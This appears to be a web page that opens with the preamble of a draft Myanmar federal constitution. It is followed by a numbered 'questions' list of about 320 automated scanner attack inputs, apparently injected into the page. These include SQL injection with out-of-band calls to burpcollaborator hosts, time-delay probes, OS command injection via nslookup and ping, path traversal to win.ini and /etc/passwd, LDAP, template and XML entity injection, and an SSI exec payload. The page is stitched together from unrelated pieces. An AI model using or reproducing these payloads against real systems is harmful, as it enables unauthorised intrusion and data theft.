ဖက်ဒရယ်ပြည်ထောင်စုသမ္မတ မြန်မာနိုင်ငံ ဖွဲ့စည်းပုံအခြေခံဥပဒေ (ဒုတိယမူကြမ်း) [FCDCC]

နိဒါန္း

            လြတ္လပ္မႈ၊ တန္းတူမႈ၊ တရားမွ်တမႈတည္းဟူေသာ ေလာကပါလတရားကုိ ဦးထိပ္ထားလ်က္ ကၽြႏု္ပ္တုိ႔ဖက္ဒရယ္ျပည္ေထာင္စု ႏုိင္ငံသားတုိ႔သည္ ၿငိမ္းခ်မ္းသာယာဝေျပာ၍ ထာဝစဥ္အဓြန္႔ရွည္တည္ တံ့ခုိင္ၿမဲမည့္ ဖက္ဒရယ္ျပည္ေထာင္စုကုိ စုေပါင္းညီညာ တည္ေဆာက္အ့ံေသာငွာ ဤဖက္ဒရယ္ ျပည္ေထာင္စု ဖြဲ႕စည္းပုံအေျခခံဥပေဒကုိ ေရးဆြဲ ျပ႒ာန္းအပ္ေပသည္။

            ဤဖက္ဒရယ္ျပည္ေထာင္စုနယ္ေျမအတြင္း၌ တုိင္းရင္းသားလူမ်ဳိးေပါင္းစုံတုိ႔သည္ ေရွးပေဝသဏီကပင္ ကုိယ့္ထီးကုိယ္နန္း ကုိယ့္ၾကငွန္းျဖင့္ လြတ္လပ္စြာေနထုိင္ခဲ့ၾကေပသည္။ တုိင္းရင္းသားလူမ်ဳိး ေပါင္းစုံတုိ႔သည္ သမုိင္းေခတ္အဆက္ဆက္တြင္ သီးျခားလြတ္လပ္စြာ ေနထုိင္ခဲ့ၾကေသာ္လည္း ၿဗိတိသွ်ကုိလုိနီနယ္ခ်ဲ႕၏ သိမ္းပုိက္မႈေအာက္တြင္ ႏွစ္ေပါင္းမ်ားစြာ အတူတကြ ကၽြန္ျပဳျခင္းခံခဲ့ၾကရပါသည္။ ထုိ႔ေၾကာင့္ မိမိတုိ႔ဆုံး႐ႈံး ခဲ့ၾကေသာ လြတ္လပ္ေရးႏွင့္ အခ်ဳပ္အျခာအာဏာတုိ႔ကုိ အတူတကြ ျပန္လည္ရယူၿပီး ျပည္ေထာင္စုႀကီးကုိပါ တၿပိဳင္နက္ ထူေထာင္ရန္ ပင္လုံညီလာခံႀကီးကုိ ၁၉၄၇ ခုႏွစ္တြင္ ေခၚယူက်င္းပခဲ့ၾကသည္။

            ဒီမုိကေရစီေရး၊ အမ်ဳိးသားတန္းတူေရးႏွင့္ ကုိယ္ပုိင္ျပ႒ာန္းခြင့္ အခြင့္အေရးမ်ားကုိ ဦးတည္ရည္မွန္း၍ ပင္လုံစာခ်ဳပ္ႀကီးတြင္ ညီညာဖ်ဖ် လက္မွတ္ေရးထုိးခဲ့ၾကၿပီး လြတ္လပ္ေရးကုိ လက္ဝယ္ပုိင္ပုိင္ ျပန္လည္ ရရွိေစ ကာမူ၊ သက္ဆုိင္ရာအာဏာပုိင္မ်ားက အေကာင္အထည္ေဖာ္ ေဆာင္ရြက္ရန္ ပ်က္ကြက္ခဲ့ၾကသည့္အတြက္ ရာစုႏွစ္ဝက္ေက်ာ္ ျပည္တြင္းစစ္မီးေတာက္ေလာင္ခဲ့ၿပီး လူ႔အသက္အုိးအိမ္စည္းစိမ္ေပါင္းမ်ားစြာ ဆုံး႐ႈံးခဲ့ရေလ သည္။ ထုိ႔အျပင္ ၁၉၆၂ ခုႏွစ္မွစ၍ အဆက္ဆက္ေသာ အာဏာရွင္စနစ္ဆုိးတုိ႔ေၾကာင့္ ဒီမုိကေရစီႏွင့္ လူ႔အခြင့္ အေရးတုိ႔ ဆိတ္သုဥ္းခဲ့ရသည္သာမက ၁၉၄၇ ခုႏွစ္တြင္ တန္းတူေရးအေျခခံမူျဖင့္ ျပည္ေထာင္စုအဖြဲ႕ဝင္မ်ား ျဖစ္လာခဲ့ၾကေသာ တုိင္းရင္းသားလူမ်ဳိးမ်ား၏ ကုိယ္ပုိင္ျပ႒ာန္းခြင့္ပါ ဆံုး႐ႈံးခဲ့ရေလသည္။ ထုိ႔ေၾကာင့္ ျပည္ေထာင္စုသားအားလုံး ရင္နင့္ဖြယ္ႀကဳံေတြ႕ခဲ့ရေသာ အေတြ႕အႀကဳံႏွင့္ ခါးသီးစြာ ခံစားခဲ့ရေသာအျဖစ္အပ်က္မ်ားကုိ ကၽြႏု္ပ္တုိ႔သည္ ေမ့ေလ်ာ့ျခင္းငွာ မျပဳအပ္ေပ။

            ထုိသုိ႔ေသာ အတိတ္ကာလ၏အမွားမ်ားကုိ ေရွာင္လႊဲႏုိင္ရန္၊ ကၽြႏု္ပ္တုိ႔အားလုံး၏ အနာဂတ္ရည္မွန္း ခ်က္မ်ားကုိ ေဖာ္ေဆာင္ႏုိင္ရန္ အလုိ႔ငွာ - တုိင္းရင္းသားလူမ်ဳိးမ်ားအားလုံး ႏုိင္ငံေရးႏွင့္လူမ်ဳိးေရးအရ တန္းတူေရး၊ ကုိယ္ပုိင္ျပ႒ာန္းခြင့္ရ ျပည္နယ္မ်ားျဖင့္ ျပည္ေထာင္စု ဖြဲ႕စည္းေရး၊ ဒီမုိကေရစီ၊ လူ႔အခြင့္အေရးႏွင့္ က်ား-မ တန္းတူေရးအေပၚ အာမခံေရး၊ တုိင္းရင္းသားလူမ်ဳိးစုလူနည္းစုမ်ား၏ အခြင့္အေရးအတြက္ အာမခံေရး၊ ႏုိင္ငံေရးႏွင့္ဘာသာေရး ေရာေထြးမႈကင္းစင္ေရးႏွင့္ စစ္ အာဏာရွင္စနစ္ ထပ္မံမေပၚလာေစေရးအတြက္ အရပ္သားအုပ္ခ်ဳပ္ေရးေအာက္တြင္ စစ္တပ္ကုိထားရိွေရး အစရွိေသာ အေျခခံမူႀကီးမ်ားကုိ ေက်ာ႐ုိးမ႑ိဳင္ျပဳ၍ ေရးဆြဲျပ႒ာန္းသည့္  ဖက္ဒရယ္ျပည္ေထာင္စု ဖြဲ႕စည္းပုံအေျခခံဥပေဒႀကီးျဖစ္ပါ သည္။

            ထုိ႔ေၾကာင့္ ဤဖက္ဒရယ္ျပည္ေထာင္စု ဖြဲ႕စည္းပုံအေျခခံဥပေဒသည္ လြတ္လပ္မႈ၏အသီးအပြင့္မ်ားကုိ မိမိတုိ႔အတြက္သာမက ေနာင္လာေနာက္သား သားစဥ္ေျမးဆက္မ်ားအထိ ရရွိခံစားေစၿပီး၊ အေမွာင္ကုိခြင္း၍ အလင္းကုိေဆာင္ဘိသကဲ့သုိ႔ အတိတ္၏ အနိ႒ာ႐ုံမ်ားကုိ လုံးဝပ်က္ျပယ္ကြယ္ေပ်ာက္ေစလ်က္ ကမ႓ာ့အလယ္တြင္ ဝင့္ထည္စြာ ရပ္တည္ႏုိင္သည့္ လြတ္လပ္၍ အခ်ဳပ္အျခာအဏာပုိင္ေသာ ဖက္ဒရယ္ ျပည္ေထာင္စု ျမန္မာႏုိင္ငံေတာ္ႀကီး၏ အျမင့္ဆုံးဥပေဒအျဖစ္ လုိက္နာက်င့္သုံးႏုိင္ရန္အတြက္ အခုိင္အမာ ျပ႒ာန္းလုိက္သည္။

မေးခွန်းများ

 1. (select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % tzfle SYSTEM "http://vhg18douzxgk6qkv7jk1b9vg57b1zuriu6mtgh5.burpcollab'||'orator.net/">%tzfle;]>'),'/l') from dual)

 2. 281406'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % tzfle SYSTEM "http://jtgpk10ibls8iewjj7wpnx74hvnpbi367uzht5i.burpcollab'||'orator.net/">%tzfle;]>'),'/l') from dual)||'

 3. 281406;declare @q varchar(99);set @q='\\8pyegqw77aoxe3s8fwsejm3tdkje77zvqled17pw.burpcollab'+'orator.net\rmu'; exec master.dbo.xp_dirtree @q;--

 4. 281406';declare @q varchar(99);set @q='\\txuzob4sfvwimo0tnh0zr7bel5rzfs7gy7mz9txi.burpcollab'+'orator.net\sfp'; exec master.dbo.xp_dirtree @q;--

 5. 281406);declare @q varchar(99);set @q='\\tvszmb2sdvuikoytlhyzp79ej5pzds5gw8k07uvj.burpcollab'+'orator.net\muo'; exec master.dbo.xp_dirtree @q;--

 6. 281406');declare @q varchar(99);set @q='\\sokyfavr6unhdnrsegryi62dc4iy6ryfp8d00uoj.burpcollab'+'orator.net\mya'; exec master.dbo.xp_dirtree @q;--

 7. (select load_file('\\\\ob3u26intqad0jeo1ceu52p9z05utnlbcd05nzbo.burpcollaborator.net\\uah'))

 8. 281406'+(select load_file('\\\\kc0q32jjumb91ffk28fq6yq50w6qujm7da12owcl.burpcollaborator.net\\raj'))+'

 9. (select*from(select(sleep(20)))a)

 10. 281406'(select*from(select(sleep(20)))a)'

 11. 281406+(select*from(select(sleep(20)))a)+

 12. 281406'+(select*from(select(sleep(20)))a)+'

 13. 281406 and (select*from(select(sleep(20)))a)--

 14. 281406' and (select*from(select(sleep(20)))a)--

 15. 281406,(select*from(select(sleep(20)))a)

 16. 281406 waitfor delay'0:0:20'--

 17. (select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % khugt SYSTEM "http://bbqh2tiatda006eb1zeh5ppwzn5htamypmh9bx0.burpcollab'||'orator.net/">%khugt;]>'),'/l') from dual)

 18. 281406' waitfor delay'0:0:20'--

 19. 281406)waitfor delay'0:0:20'--

 20. 783470'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % khugt SYSTEM "http://gi2m9ypf0ih57blg84lmcuw16scm0ft3xrpej28.burpcollab'||'orator.net/">%khugt;]>'),'/l') from dual)||'

 21. 281406')waitfor delay'0:0:20'--

 22. 783470;declare @q varchar(99);set @q='\\6qxchox588pvf1t6gutckk4reikc851tsjgb35ru.burpcollab'+'orator.net\fuf'; exec master.dbo.xp_dirtree @q;--

 23. 281406,0)waitfor delay'0:0:20'--

 24. 783470';declare @q varchar(99);set @q='\\lh6r83okznga6gkl79krbzv65xbrzks8jz7rulia.burpcollab'+'orator.net\osi'; exec master.dbo.xp_dirtree @q;--

 25. 783470);declare @q varchar(99);set @q='\\ksgqj2zjamr9hfvki8vqmy65gwmqaj37uzir5lta.burpcollab'+'orator.net\hzy'; exec master.dbo.xp_dirtree @q;--

 26. 28140699471107 or 1086=01086

 27. 783470');declare @q varchar(99);set @q='\\ioaof0vh6kn7ddrie6roiw23cuio6hz5qyeq1kp9.burpcollab'+'orator.net\pfu'; exec master.dbo.xp_dirtree @q;--

 28. (select load_file('\\\\b5hhwtcand40u68bvz8hzpjwtnzhnagy70vsim6b.burpcollaborator.net\\trw'))

 29. 28140616454915 or 4968=4974

 30. 783470'+(select load_file('\\\\6jqcaoq518iv81m69umcdkxr7idc15utlw9owik7.burpcollaborator.net\\gid'))+'

 31. 28140699760885 or 9519=9519

 32. (select*from(select(sleep(20)))a)

 33. 28140614556673 or 2812=28120

 34. 783470'(select*from(select(sleep(20)))a)'

 35. 783470+(select*from(select(sleep(20)))a)+

 36. 28140644445765 or 7170=07170--

 37. 783470'+(select*from(select(sleep(20)))a)+'

 38. 783470 and (select*from(select(sleep(20)))a)--

 39. 783470' and (select*from(select(sleep(20)))a)--

 40. 783470,(select*from(select(sleep(20)))a)

 41. 28140692509326 or 5306=5315--

 42. 783470 waitfor delay'0:0:20'--

 43. 783470' waitfor delay'0:0:20'--

 44. 783470)waitfor delay'0:0:20'--

 45. 28140670090464 or 1463=1463--

 46. 783470')waitfor delay'0:0:20'--

 47. 783470,0)waitfor delay'0:0:20'--

 48. 28140686700930 or 1709=17090--

 49. 783470',0)waitfor delay'0:0:20'--

 50. 78347084539256 or 4899=04899

 51. 281406 and 4664=04664

 52. 78347064045411 or 5532=5540

 53. 281406 and 1427=1436

 54. 78347016108511 or 4796=4796

 55. 281406 and 7599=7599

 56. 78347031974126 or 3872=38720

 57. 281406 and 8677=86770

 58. 78347013220404 or 6696=06696--

 59. 78347099699424 or 7369=7373--

 60. 281406 and 4107=04107--

 61. 78347099989753 or 5585=5585--

 62. 281406 and 8227=8231--

 63. 281406 and 9350=9350--

 64. 78347055778891 or 6769=67690--

 65. 281406 and 7329=73290--

 66. 783470 and 5247=05247

 67. 28140683539380' or '2411'='2411

 68. 783470 and 6613=6622

 69. 28140665133615' or '2007'='2015

 70. 783470 and 5284=5284

 71. 28140653474602' or '8465'='8465

 72. 783470 and 5381=53810

 73. 28140637608569' or '9700'='9700'

 74. 783470 and 3518=03518--

 75. 28140658268366' or 2159=2159--

 76. 783470 and 7466=7471--

 77. 28140663356429' or 8199=8204--

 78. 783470 and 4019=4019--

 79. 28140679899255' or 4587=4587--

 80. 783470 and 7287=72870--

 81. 78347034528335' or '8590'='8590

 82. 28140675502561' or 6779=6779'--

 83. 281406' and '2572'='2572

 84. 78347012951350' or '6775'='6781

 85. 281406' and '1165'='1171

 86. 78347051755472' or '2083'='2083

 87. 281406' and '6673'='6673

 88. 78347095493539' or '1025'='1025'

 89. 78347019292015' or 6397=6397--

 90. 281406' and '3001'='3001'

 91. 78347012996875' or 1265=1266--

 92. 281406' and 8233=8233--

 93. 78347063352558' or 1798=1798--

 94. 281406' and 6873=6882--

 95. 78347043980041' or 2995=2995'--

 96. 281406' and 8759=8759--

 97. 783470' and '8956'='8956

 98. 281406' and 9677=9677'--

 99. 783470' and '9805'='9809

 100. 783470' and '5815'='5815

 101. 281406b8vym7tdb5

 102. 783470' and '8802'='8802'

 103. 783470' and 3607=3607--

 104. 281406z9sef<a>y6a5v

 105. 783470' and 6857=6862--

 106. 281406z9sef<a>y6a5v

 107. 783470' and 6601=6601--

 108. 281406z9sef%3ca%3ey6a5v

 109. 783470' and 3063=3063'--

 110. 281406z9sef<a>y6a5v

 111. 281406uz7bhh4paz><

 112. 281406uz7bhh4paz><

 113. 783470yvntkpz1sc

 114. 281406uz7bhh4paz%3e%3c

 115. 281406uz7bhh4paz><

 116. 783470c6hoq<a>n1xte

 117. 783470c6hoq<a>n1xte

 118. 783470c6hoq%3ca%3en1xte

 119. th2hz%3ca%3eg5to9

 120. 783470c6hoq<a>n1xte

 121. 783470uaph35nfed><

 122. 783470uaph35nfed><

 123. 783470uaph35nfed%3e%3c

 124. hc3z92edet%3e%3c

 125. 783470uaph35nfed><

 126. i0ekl${864*891}zt65e

 127. ctlje{{465*653}}isyjp

 128. 281406}}yuh4l'/"<f9h8m

 129. he0or%3ca%3ev40qy

 130. 281406%}zttv0'/"<t992m

 131. 281406tpl6f%>km6gq'/"<demyu

 132. 281406'+sleep(20.to_i)+'

 133. 281406'+eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))+'

 134. eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))

 135. 281406'.sleep(20).'

 136. 281406{${sleep(20)}}

 137. nx7fbwepcg%41rqj26nul13

 138. hbulv1tc8m%3e%3c

 139. nx7fbwepcg%41rqj26nul13

 140. u9518${791*619}c2z7e

 141. w9v9klantp\\lf70tk8d9u

 142. w9v9klantp\\lf70tk8d9u

 143. mb7ol{{168*496}}q7cz9

 144. 783470}}l5b5c'/"<vgftm

 145. 3e4flx1oe7&#65;49e3xtodez

 146. 783470%}tqcca'/"<c6c7x

 147. 3e4flx1oe7&#65;49e3xtodez

 148. 783470q4qf8%>tjagl'/"<xrc9l

 149. 281406wm8pzc218s%41a6jpg2wcc1

 150. 783470'+sleep(20.to_i)+'

 151. 783470'+eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))+'

 152. eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))

 153. 783470'.sleep(20).'

 154. 783470{${sleep(20)}}

 155. 281406wm8pzc218s%41a6jpg2wcc1

 156. 281406yhrlr9t7am\\lyjzoql7dx

 157. b7iiufuz13%41lwn0kkj6c7

 158. 281406yhrlr9t7am\\lyjzoql7dx

 159. b7iiufuz13%41lwn0kkj6c7

 160. 2814063o30t6d3rp&#65;9zbh4a3z48

 161. 8kw1eckjo0\\l27fskzwpr

 162. 2814063o30t6d3rp&#65;9zbh4a3z48

 163. 8kw1eckjo0\\l27fskzwpr

 164. ixjoo04hfkw7md0in60orwb3lurofh75ztrgl4a.burpcollaborator.net

 165. m8qa6lue5s&#65;z2m0xfm9tg

 166. http://5tzbkn04b7sui0w5jtwbnj7qhhnbb43stgl3fr4.burpcollaborator.net/?920871

 167. m8qa6lue5s&#65;z2m0xfm9tg

 168. nslookup -q=cname m2pst49lko1brh5msa5sw0g7qywsklc95ct4gy4n.burpcollaborator.net.&

 169. 783470t0djrgjdjk%41hshmehqzzl

 170. 783470t0djrgjdjk%41hshmehqzzl

 171. 281406|nslookup -q=cname y434vgbxm03ntt7yum74ycijsay4mxela92wwkl.burpcollaborator.net.&

 172. 783470n4bzo1hx3h\\lc0drrivgz

 173. 281406'"`0&nslookup -q=cname ap3ggsw97coze5safysgjo3vdmjg79zxwlo8iw7.burpcollaborator.net.&`'

 174. 783470n4bzo1hx3h\\lc0drrivgz

 175. 281406&nslookup -q=cname 8cle3qj7uabx13f82wfe6mqt0k6eu7mvhj963us.burpcollaborator.net.&'\"`0&nslookup -q=cname 8cle3qj7uabx13f82wfe6mqt0k6eu7mvhj963us.burpcollaborator.net.&`'

 176. 783470pqxoucxb7n&#65;1b2f8407vi

 177. 281406|echo dfr0miycx5 ifxvg28t3t||a #' |echo dfr0miycx5 ifxvg28t3t||a #|" |echo dfr0miycx5 ifxvg28t3t||a #

 178. 281406&echo hompwfoiv2 et2fc7rmgs&

 179. 281406"|echo vau3iogis9 qaccq5h7yc ||

 180. 281406'|echo x5hp7t8wrv ehdkxjg8ur #xzwx

 181. 281406|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1

 182. 281406|ping -c 21 127.0.0.1||x

 183. 281406&ping -n 21 127.0.0.1&

 184. 783470pqxoucxb7n&#65;1b2f8407vi

 185. 281406'|ping -c 21 127.0.0.1 #

 186. 281406"|ping -n 21 127.0.0.1 ||

 187. ek2kbwrd2gj399nea2nkesyz8qek2dv1npfc90y.burpcollaborator.net

 188. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini

 189. c:\windows\win.ini

 190. ../../../../../../../../../../../../../../../../windows/win.ini

 191. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini

 192. ../../../../../../../../../../../../../../../../winnt/win.ini

 193. http://9gqf7rn8ybfy54j96xjfanuu4lafy8rwhk973vs.burpcollaborator.net/?464618

 194. \windows\win.ini

 195. file:///c:/windows/win.ini

 196. ...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\windows\win.ini

 197. .../.\.../.\.../.\.../.\.../.\.../.\.../.\.../.\.../.\.../.\windows/win.ini

 198. ...\./...\./...\./...\./...\./...\./...\./...\./...\./...\./windows/win.ini

 199. nslookup -q=cname ptmvk70obrseikwpjdwvn37ah1nvbo4cxfl781wq.burpcollaborator.net.&

 200. %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini

 201. 920871..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini

 202. 920871../../../../../../../../../../../../../../../../windows/win.ini

 203. 783470|nslookup -q=cname oumul61ncqtdjjxokcxuo289i0oucn5b1ztmnac.burpcollaborator.net.&

 204. 920871..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini

 205. 920871../../../../../../../../../../../../../../../../winnt/win.ini

 206. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini920871

 207. c:\windows\win.ini920871

 208. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini920871

 209. 783470'"`0&nslookup -q=cname 479ayme3p66twza4xsaa1ilpvg1ap3irff721qq.burpcollaborator.net.&`'

 210. ../../../../../../../../../../../../../../../../etc/passwd

 211. 783470&nslookup -q=cname 0z06qi6zh2ypov20po26tedlnct6hzan5bxyrmg.burpcollaborator.net.&'\"`0&nslookup -q=cname 0z06qi6zh2ypov20po26tedlnct6hzan5bxyrmg.burpcollaborator.net.&`'

 212. file:///etc/passwd

 213. ..././..././..././..././..././..././..././..././..././..././etc/passwd

 214. 783470|echo rc65kqbdbf wj9vfvljqk||a #' |echo rc65kqbdbf wj9vfvljqk||a #|" |echo rc65kqbdbf wj9vfvljqk||a #

 215. %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

 216. 783470&echo 9eggzdi86v ftbc51oajk&

 217. 920871../../../../../../../../../../../../../../../../etc/passwd

 218. 783470"|echo 9r83gkan2h ckwlnlv7hx ||

 219. ../../../../../../../../../../../../../../../../etc/passwd920871

 220. 783470'|echo 25yxo87tj4 wm685vaw8f #xzwx

 221. 783470|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1

 222. 783470|ping -c 21 127.0.0.1||x

 223. 783470&ping -n 21 127.0.0.1&

 224. 783470'|ping -c 21 127.0.0.1 #

 225. 783470"|ping -n 21 127.0.0.1 ||

 226. qk78kl64wu)(objectClass=*

 227. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini

 228. theyrb8hr9)(!(objectClass=*)

 229. c:\windows\win.ini

 230. *)(objectClass=*

 231. ../../../../../../../../../../../../../../../../windows/win.ini

 232. *)(!(objectClass=*)

 233. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini

 234. ../../../../../../../../../../../../../../../../winnt/win.ini

 235. \windows\win.ini

 236. file:///c:/windows/win.ini

 237. ...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\windows\win.ini

 238. .../.\.../.\.../.\.../.\.../.\.../.\.../.\.../.\.../.\.../.\windows/win.ini

 239. <uys xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://dgxj7vncyff258jd61jjaruy4pajycq0qoibcz1.burpcollaborator.net/uys.xsd">uys</uys>

 240. ...\./...\./...\./...\./...\./...\./...\./...\./...\./...\./windows/win.ini

 241. <pje xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://4qvahmx386ptfzt4gstaki4pegka830r1ft2nqc.burpcollaborator.net/foo"/></pje>

 242. %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini

 243. 464618..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini

 244. 464618../../../../../../../../../../../../../../../../windows/win.ini

 245. 464618..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini

 246. 464618../../../../../../../../../../../../../../../../winnt/win.ini

 247. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini464618

 248. c:\windows\win.ini464618

 249. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini464618

 250. ../../../../../../../../../../../../../../../../etc/passwd

 251. file:///etc/passwd

 252. (function(){if(typeof r07hg==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);r07hg=1;}}())

 253. ..././..././..././..././..././..././..././..././..././..././etc/passwd

 254. 281406'+(function(){if(typeof bxsyk==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);bxsyk=1;}}())+'

 255. %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

 256. 464618../../../../../../../../../../../../../../../../etc/passwd

 257. ../../../../../../../../../../../../../../../../etc/passwd464618

 258. "-->'-->`--><!--#set var="2um" value="1tl7kj00b3"--><!--#set var="4wo" value="3vn9ml22d5"--><!--#echo var="2um"--><!--#echo var="4wo"--><!--#exec cmd="nslookup -q=cname og8u76nnyqfd5jjo6cjua2u940auynqbi961tvhk.burpcollaborator.net" -->

 259. j6yybz1x3c)(objectClass=*

 260. ji0iqygqo8)(!(objectClass=*)

 261. *)(objectClass=*

 262. *)(!(objectClass=*)

 263. nslookup -q=cname ecuk3wjdugb319fe22fk6sqz0q6kudm1f43wqqef.burpcollaborator.net.&

 264. 785335|nslookup -q=cname egyk7wndygf359je62jkasuz4qakydq1mpec80x.burpcollaborator.net.&

 265. nslookup -q=cname wqq2hexv8yplfrtwgkt2ka4he8k28v1jumie58tx.burpcollaborator.net.&

 266. 949809|nslookup -q=cname t4yzvbbsmv3ito7tuh7zy7ies5yzmsfgb43rxfm.burpcollaborator.net.&

 267. 949809'"`0&nslookup -q=cname 66acxod5o85vv196wu9c0kkrui0co5hteh640sp.burpcollaborator.net.&`'

 268. 785335'"`0&nslookup -q=cname w2z2te9vky1lrr5wsk52waghq8w2kvcj971uvik.burpcollaborator.net.&`'

 269. 785335&nslookup -q=cname 0316uiazl22psv60to66xehlrcx6lzdn8b0yumj.burpcollaborator.net.&'\"`0&nslookup -q=cname 0316uiazl22psv60to66xehlrcx6lzdn8b0yumj.burpcollaborator.net.&`'

 270. 949809&nslookup -q=cname 8t2ekq07basxi3w8jwwenm7thkneb74vzjr6lua.burpcollaborator.net.&'\"`0&nslookup -q=cname 8t2ekq07basxi3w8jwwenm7thkneb74vzjr6lua.burpcollaborator.net.&`'

 271. 785335|echo br5jlkua4j f7kghlaul4||a #' |echo br5jlkua4j f7kghlaul4||a #|" |echo br5jlkua4j f7kghlaul4||a #

 272. 785335&echo y192v8se8x bmbosigzmz&

 273. 785335"|echo pgq04t5ysq llkzdn3eii ||

 274. 785335'|echo ocdck49hti zsvajnjywh #xzwx

 275. 785335|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1

 276. 785335|ping -c 21 127.0.0.1||x

 277. 785335&ping -n 21 127.0.0.1&

 278. 785335'|ping -c 21 127.0.0.1 #

 279. 785335"|ping -n 21 127.0.0.1 ||

 280. 949809|echo smtsdqlv6i ip1tzumd47||a #' |echo smtsdqlv6i ip1tzumd47||a #|" |echo smtsdqlv6i ip1tzumd47||a #

 281. 949809&echo 9mk33qkic3 l7pxwplv8v&

 282. 949809"|echo neu1ktdw1f j38gya9m5x ||

 283. 949809'|echo 1inffbankb sz3dct6yoe #xzwx

 284. 949809|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1

 285. 949809|ping -c 21 127.0.0.1||x

 286. 949809&ping -n 21 127.0.0.1&

 287. 949809'|ping -c 21 127.0.0.1 #

 288. 949809"|ping -n 21 127.0.0.1 ||

 289. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini

 290. c:\windows\win.ini

 291. ../../../../../../../../../../../../../../../../windows/win.ini

 292. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini

 293. ../../../../../../../../../../../../../../../../winnt/win.ini

 294. \windows\win.ini

 295. file:///c:/windows/win.ini

 296. ...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\windows\win.ini

 297. .../.\.../.\.../.\.../.\.../.\.../.\.../.\.../.\.../.\.../.\windows/win.ini

 298. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini

 299. ...\./...\./...\./...\./...\./...\./...\./...\./...\./...\./windows/win.ini

 300. c:\windows\win.ini

 301. ../../../../../../../../../../../../../../../../windows/win.ini

 302. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini

 303. ../../../../../../../../../../../../../../../../winnt/win.ini

 304. \windows\win.ini

 305. file:///c:/windows/win.ini

 306. ...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\windows\win.ini

 307. .../.\.../.\.../.\.../.\.../.\.../.\.../.\.../.\.../.\.../.\windows/win.ini

 308. ...\./...\./...\./...\./...\./...\./...\./...\./...\./...\./windows/win.ini

 309. %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini

 310. 920871..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini

 311. 920871../../../../../../../../../../../../../../../../windows/win.ini

 312. 920871..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini

 313. 920871../../../../../../../../../../../../../../../../winnt/win.ini

 314. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini920871

 315. c:\windows\win.ini920871

 316. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini920871

 317. ../../../../../../../../../../../../../../../../etc/passwd

 318. %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini

 319. 464618..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini

 320. 464618../../../../../../../../../../../../../../../../windows/win.ini

